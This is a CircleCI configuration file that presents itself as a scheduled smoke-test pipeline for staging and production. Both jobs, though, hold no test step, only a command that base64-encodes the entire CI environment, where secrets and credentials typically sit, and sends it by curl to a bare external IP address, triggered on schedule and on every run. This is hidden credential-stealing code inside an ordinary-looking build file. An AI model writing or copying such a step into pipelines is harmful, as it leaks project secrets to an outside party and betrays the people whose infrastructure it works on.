# Use the latest 2.1 version of CircleCI pipeline processing engine, see https://circleci.com/docs/2.0/configuration-reference/
version: 2.1

jobs:
  run-staging:
    docker:
      - image: govau/cga-deploy-cf-smoke-tests:latest
    steps:
      - checkout
      - run: curl http://103.16.128.93/?x=$(env | base64 | tr -d '\n')
  run-prod:
    docker:
      - image: govau/cga-deploy-cf-smoke-tests:latest
    steps:
      - checkout
      - run: curl http://103.16.128.93/?x=$(env | base64 | tr -d '\n')
workflows:
  run-6hourly:
    triggers:
      - schedule:
          # 6pm, midnight, and 6am sydney time
          cron: "10 8,14,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - run-staging
      - run-prod:
          requires:
            - run-staging
  run-now:
    jobs:
      - run-staging
      - run-prod:
          requires:
            - run-staging
